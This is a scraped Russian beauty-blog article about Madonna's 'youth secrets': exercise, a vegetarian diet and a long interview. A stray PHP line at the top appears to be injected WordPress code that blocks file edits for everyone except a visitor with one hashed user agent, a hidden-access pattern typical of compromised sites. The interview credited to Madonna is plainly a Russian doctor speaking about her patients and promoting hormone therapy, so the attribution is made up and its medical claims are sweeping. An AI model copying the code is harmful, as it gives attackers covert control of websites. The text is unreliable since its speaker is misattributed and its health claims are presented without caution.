if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как Мадонне удается так выглядеть? Раскрываем секреты молодости Мадонны | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как Мадонне удается так выглядеть? Раскрываем секреты молодости Мадонны

Известная певица Мадонна поражает своих поклонников не только прекрасным голосом, эксцентричными выходками и безусловным талантом. Одним из поразительных достоинств певицы является ее безупречный внешний вид. Предлагаю вам узнать несколько тайн удивительной красоты поп-дивы.

Извест­ная певи­ца Мадон­на пора­жа­ет сво­их поклон­ни­ков не толь­ко пре­крас­ным голо­сом, экс­цен­трич­ны­ми выход­ка­ми и без­услов­ным талан­том. Одним из пора­зи­тель­ных досто­инств певи­цы явля­ет­ся ее без­упреч­ный внеш­ний вид. Мадон­на уже проч­но зани­ма­ет почет­ное зва­ние секс-сим­во­ла несколь­ких поко­ле­ний. Ей под­ра­жа­ют и под­рост­ки, и мамы, и дамы баль­за­ков­ско­го воз­рас­та. Что уж гово­рить о муж­чи­нах! Мадон­на будо­ра­жит умы муж­чин все­го мира толь­ко одним сво­им внеш­ним видом.

Воз­раст Мадон­ны уже несколь­ко лет назад пере­ва­лил за пяти­де­ся­ти­лет­ний рубеж, тогда как ее фигу­ра и лицо гово­рят об обрат­ном. Разу­ме­ет­ся, вре­мя без­жа­лост­но ко всем вне зави­си­мо­сти от ста­ту­са и попу­ляр­но­сти. Певи­ца не откры­ла сек­рет веч­ной моло­до­сти и кра­со­ты, хотя ино­гда такие мыс­ли все-таки неволь­но посе­ща­ют голо­вы фана­тов при взгля­де на диву.

На самом деле, как и у любой жен­щи­ны, у Мадон­ны име­ет­ся в запа­се несколь­ко сек­ре­тов ухо­да за собой, воло­са­ми и кожей лица, кото­ры­ми она щед­ро делит­ся со все­ми жела­ю­щи­ми. Пред­ла­гаю и вам узнать несколь­ко тайн уди­ви­тель­ной кра­со­ты поп-дивы.

Секреты ухода за собой, волосами и кожей лица от Мадонны

Madonna--1182724
Ока­зы­ва­ет­ся, Мадон­на Луи­за Веро­ни­ка Чик­коне пере­ня­ла свою при­тя­га­тель­ную внеш­ность по наслед­ству. Ее мать родом из Фран­ции, а отец – из Ита­лии. Не уди­ви­тель­но, что в резуль­та­те тако­го сли­я­ния не мог­ло полу­чить­ся нечто менее прекрасное.

Поп-дива про­шла за свою карье­ру нелег­кий путь от дев­чуш­ки 80‑х годов в сти­ле панк до при­мер­ной забот­ли­вой мамоч­ки 90‑х годов. При этом попу­ляр­ность певи­цы не пада­ла ни разу. При­выч­ка Мадон­ны менять свой имидж очень часто повлек­ла за собой усто­яв­ше­е­ся выра­же­ние, харак­те­ри­зу­ю­щее ее стиль – хаме­ле­он. Стиль Мадон­ны мгно­вен­но под­стра­и­вал­ся под любые изме­не­ния в мире моды. Ни одна зна­ме­ни­тость не меня­ла свой облик так часто, как это дела­ла она.

Мадон­на не толь­ко была посто­ян­но «на гребне вол­ны», испро­бо­вав все мод­ные новин­ки сти­ля и кра­со­ты. Она зача­стую и сама ста­но­ви­лась зако­но­да­тель­ни­цей мод, пода­вая при­мер всем поклон­ни­цам и кол­ле­гам по сцене.

При­чес­ка со вре­мен сти­ля «дис­ко», длин­ные рос­кош­ные рес­ни­цы с кри­стал­ла­ми Сва­ров­ски, яркий маки­яж – это все­го лишь несколь­ко тен­ден­ций, кото­рые теперь встре­ча­ют­ся у мно­гих совре­мен­ных певиц и актрис. А ведь этот образ впер­вые был исполь­зо­ван имен­но Мадон­ной, кото­рую бри­тан­ский жур­нал ELLE несколь­ко лет назад по пра­ву награ­дил зва­ни­ем «Ико­на стиля».

Ей дав­но испол­ни­лось 50 лет, но такой фигу­ре, как у нее, могут поза­ви­до­вать и неко­то­рые 20-лет­ние дев­чон­ки. В чем же ее секрет?

Спорт

madonna-hung-up
Дело в том, что Мадон­на мно­го вре­ме­ни уде­ля­ла спор­ту. В моло­до­сти поп-дива посто­ян­но под­вер­га­ла себя еже­днев­ным жесто­чай­шим тре­ни­ров­кам. Имен­но по этой при­чине она мог­ла выдер­жать посто­ян­ные кон­церт­ные туры с нескон­ча­е­мы­ми тан­це­валь­ны­ми номерами.

Мно­гие моло­дые барыш­ни наше­го вре­ме­ни забы­ва­ют о таком важ­ном мето­де ухо­да за сво­им телом и духом, как спорт. Когда ты юна и пре­крас­на, ста­рость кажет­ся нево­об­ра­зи­мо дале­кой. Зачем тра­тить вре­мя на изну­ри­тель­ные тре­ни­ров­ки, когда твое тело и так при­тя­ги­ва­ет сот­ни вос­хи­щен­ных и завист­ли­вых взгля­дов? Имен­но поэто­му мы име­ем боль­шин­ство жен­щин, под­хо­дя­щих к ста­ро­сти, с обвис­лой кожей, неухо­жен­ным лицом и волосами.

Поэто­му, девуш­ки, помни­те, что кра­со­та тре­бу­ет жертв, а спорт даже и не явля­ет­ся таким страш­ным нака­за­ни­ем. Он очи­ща­ет не толь­ко тело от ненуж­ных жиров и вред­ных веществ, но и голо­ву от пло­хих зло­бо­днев­ных мыслей.

Даже сей­час певи­ца Мадон­на не пере­ста­ет забо­тить­ся о сво­ем теле с нуж­ной тща­тель­но­стью. Про­жи­вая в  Лон­доне, она уде­ля­ет мно­го вре­ме­ни пила­те­су и йоге. А нахо­дясь в Нью-Йор­ке ее лег­ко мож­но встре­тить на про­беж­ке в Цен­траль­ном Парке.

Диета

Madonna
Поми­мо тре­ни­ро­вок певи­ца при­дер­жи­ва­ет­ся стро­гой дие­ты, вклю­ча­ю­щей в себя толь­ко здо­ро­вые про­дук­ты и напит­ки. Она пре­иму­ще­ствен­но потреб­ля­ет веге­та­ри­ан­скую пищу, не содер­жа­щую сахар, мясо и молоч­ные продукты.

Пита­ние – это еще одна осно­ва здо­ро­во­го тела, чисто­го лица и эффект­ной фигу­ры. Преж­де чем поедать бес­чис­лен­ное коли­че­ство пон­чи­ков, пицц, фаст­фу­да и запи­вать это слад­ки­ми гази­ро­ван­ны­ми напит­ка­ми, поду­май­те о том, что это повре­дит не толь­ко вашей пище­ва­ри­тель­ной систе­ме, но и повле­чет за собой мас­су дру­гих ужас­ных послед­ствий. Пры­щи на лицо – след­ствие жир­ной пищи, «ушки» на ногах, лиш­ние жиро­вые отло­же­ния, боль­шая нагруз­ка на печень, подав­лен­ное и уста­лое состо­я­ние… Спи­сок мож­но про­дол­жать еще дол­го. Все это послед­ствия непра­виль­но­го питания.

На эту тему певи­ца дала инте­рес­ное интер­вью:

ПОЧЕМУ МЫ СТАРЕЕМ

— Суще­ству­ет нема­ло вер­сий, поче­му чело­век ста­ре­ет. Какую вы разделяете?

— Мне кажет­ся вер­ной эндо­крин­ная тео­рия ста­ре­ния, автор ее — наш сооте­че­ствен­ник Вла­ди­мир Диль­ман. Мы начи­на­ем болеть и ста­реть, когда с воз­рас­том все желе­зы начи­на­ют рабо­тать с пони­жен­ной актив­но­стью и про­ис­хо­дит паде­ние выра­бот­ки важ­ных гор­мо­нов… Еще век назад сред­няя про­дол­жи­тель­ность жиз­ни была 49 лет, а сего­дня в циви­ли­зо­ван­ных стра­нах — 80. Бла­го­да­ря заво­е­ва­ни­ям меди­ци­ны мы дости­га­ем воз­рас­та нездо­ро­вья и живем в состо­я­нии болез­ней зна­чи­тель­ную часть жиз­ни. Мы ста­ли дожи­вать до глав­ной болез­ни — дефи­ци­та поло­вых гормонов.

— То есть вы счи­та­е­те, что полу­чай наш орга­низм доста­точ­ное коли­че­ство гор­мо­нов — и мож­но отме­нять старость?

— Да. Сни­же­ние выра­бот­ки поло­вых гор­мо­нов — клю­че­вой момент ста­ре­ния. Наша жизнь делит­ся на два пери­о­да. Пер­вый — поло­вых гор­мо­нов предо­ста­точ­но, орга­низ­му лег­ко и про­сто спра­вить­ся с боль­шин­ством болез­ней. Вто­рой — после наступ­ле­ния дефи­ци­та поло­вых гор­мо­нов, когда болез­ни при­об­ре­та­ют про­грес­си­ру­ю­щий харак­тер, идет их необ­ра­ти­мое тече­ние. Вещи надо назы­вать сво­и­ми име­на­ми: кли­макс у жен­щин и дефи­цит андро­ге­нов у муж­чин — это неесте­ствен­ное состо­я­ние. И любое пато­ло­ги­че­ское состо­я­ние нуж­но лечить. Если нехват­ку поло­вых гор­мо­нов лик­ви­ди­ро­вать вовре­мя, сколь­ких про­блем мож­но избе­жать! Пре­ду­пре­дить остео­по­роз (если диа­гноз постав­лен, увы, лече­ние опоз­да­ло), не дать раз­вить­ся диа­бе­ту, ожи­ре­нию, болез­ни Альцгеймера…

БЕРЕГИТЕ ФИГУРУ

— А чем же тогда объ­яс­нить, что сего­дня помо­ло­де­ли диа­бет, инсульт, инфаркт?

— Совсем моло­дые люди нае­да­ют ожи­ре­ние, что ведет к сни­же­нию выра­бот­ки поло­вых гор­мо­нов. У пол­ных муж­чин и жен­щин рано появ­ля­ет­ся гор­мо­наль­ный дефи­цит, они ста­ре­ют преж­де вре­ме­ни. Но мно­гие жен­щи­ны под­хо­дят к зре­ло­му воз­рас­ту, не ощу­щая про­блем. Если сего­дня у жен­щи­ны 45 лет нет жалоб на само­чув­ствие, то все рав­но через 10 лет ее дого­нят болезни.

Кто-то ощу­ща­ет нехват­ку эст­ро­ге­нов, кому-то недо­ста­ет тесто­сте­ро­на или вита­ми­на D. Внешне это вид­но даже нево­ору­жен­ным гла­зом. Эст­ро­ге­ны — гор­мо­ны, отве­ча­ю­щие за кра­со­ту, поэто­му у жен­щи­ны с их дефи­ци­том рано появ­ля­ют­ся мор­щи­ны. А у ее сверст­ни­цы с нехват­кой тесто­сте­ро­на при­бав­ля­ет­ся вес, исче­за­ет соци­аль­ная актив­ность , сни­жа­ет­ся сек­су­аль­ность. Она по-преж­не­му кра­си­ва, но ей совер­шен­но не хочет­ся поль­зо­вать­ся сво­ей привлекательностью.

Вот исто­рия моей паци­ент­ки. Ее судь­ба — весь­ма рас­про­стра­нен­ная для Рос­сии: в 38 лет ей уда­ли­ли дето­род­ные орга­ны, но вра­чи не про­пи­са­ли ЗГТ, пото­му что она ни на что не жало­ва­лась. Годы шли. Рас­па­лась семья, муж ушел к дру­гой жен­щине. Тем не менее она за собой сле­дит, зани­ма­ет­ся йогой. В 42 года я нако­нец-то назна­чаю ей ЗГТ, но она опять попа­да­ет к дру­гим док­то­рам, кото­рые про­сто запу­ги­ва­ют ее: «Посмот­ри, какая ты кра­си­вая, у тебя все еще будет хоро­шо, а гор­мо­ны запу­стят ожи­ре­ние и рак».

На тот момент у нее было еще мно­го тесто­сте­ро­на, поэто­му она не при­ба­ви­ла в весе, ее не мучи­ли при­ли­вы. Но очень ско­ро насту­пил момент, когда тесто­сте­рон стал сни­жать­ся, и у жен­щи­ны исчез­ло либи­до. Тогда она сно­ва вер­ну­лась ко мне. Ито­го пять лет без­дей­ствия. К жен­щине при­шла ста­рость, у нее нет жела­ния ходить в гости, ей не нужен секс. Появи­лись склад­ки на спине, на бед­рах цел­люлит, кожа на руках про­вис­ла — нали­цо при­зна­ки нехват­ки тестостерона.

КОСМЕТОЛОГИ НЕ ПОМОГУТ?

— Когда необ­хо­ди­мо назна­чать заме­сти­тель­ную гор­мо­наль­ную терапию?

— Как толь­ко появил­ся дефи­цит, пото­му что каж­дый день, месяц, год, про­жи­тый без гор­мо­нов, нано­сит необ­ра­ти­мый удар. Ате­ро­скле­роз, кото­рый запу­стил­ся, уже не оста­но­вить. ЗГТ, назна­чен­ная с опоз­да­ни­ем, замед­лит про­грес­сию, но она не гаран­ти­ру­ет избав­ле­ния от болез­ни. Это кон­цеп­ция ХХI века — про­фи­лак­ти­че­ская меди­ци­на. В мире дефи­цит поло­вых гор­мо­нов и вита­ми­на D научи­лись не толь­ко опре­де­лять и вос­пол­нять, но и пре­ду­пре­ждать — зара­нее делать нуж­ные шаги.

А наши вра­чи, охва­чен­ные гор­мо­но­фо­би­ей, не назна­ча­ют ЗГТ паци­ент­кам, пото­му что у них нет соб­ствен­но­го опы­та при­ме­не­ния этой тера­пии. А в Шве­ции, напри­мер , в 2011 году 87 про­цен­тов гине­ко­ло­гов соот­вет­ству­ю­ще­го воз­рас­та полу­ча­ли ЗГТ, пото­му они и выпи­сы­ва­ли ее более чем поло­вине ровес­ниц в стране. Стра­хи про­хо­дят, когда чело­век при­об­ре­та­ет свой опыт. А сколь­ко наших вра­чей про­бо­ва­ли гор­мо­ны? Счи­та­ные еди­ни­цы. Резуль­тат: сего­дня, как 15 лет назад, менее 1 про­цен­та рос­сий­ских жен­щин полу­ча­ют ЗГТ. Жен­щи­ны не осве­дом­ле­ны о гор­мо­наль­ных препаратах.

— Навер­ное, осталь­ные за моло­до­стью идут в кос­ме­ти­че­ский салон, а не в поликлинику.

— На самом деле хоро­ший кос­ме­то­лог под­ска­жет, что воз­раст не скро­ешь одним боток­сом. И кос­ме­то­ло­ги, а не гине­ко­ло­ги оста­ют­ся лиде­ра­ми в назна­че­нии ЗГТ. Пото­му что как толь­ко поло­вые гор­мо­ны ухо­дят, все про­це­ду­ры, кото­рые пред­ла­га­ют в сало­нах, пере­ста­ют помо­гать. Поверь­те, Мадон­на выгля­дит так хоро­шо не пото­му, что дела­ла пла­сти­ку. Она полу­ча­ет гор­мо­наль­ную тера­пию — эст­ро­ге­ны, гес­та­ге­ны, тесто­сте­рон и вита­мин D.

Так что сле­ди­те и заботь­тесь о сво­ем теле как о хра­ме и буде­те выгля­деть так же умо­по­мра­чи­тель­но, как Мадон­на и в 20 лет, и в 50!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Ангелина Левковская

Увлекаюсь косметологией. Особенно интересно делать своими руками разные кремчики, масочки, лосьончики... ммм, класс! Читайте все мои записи!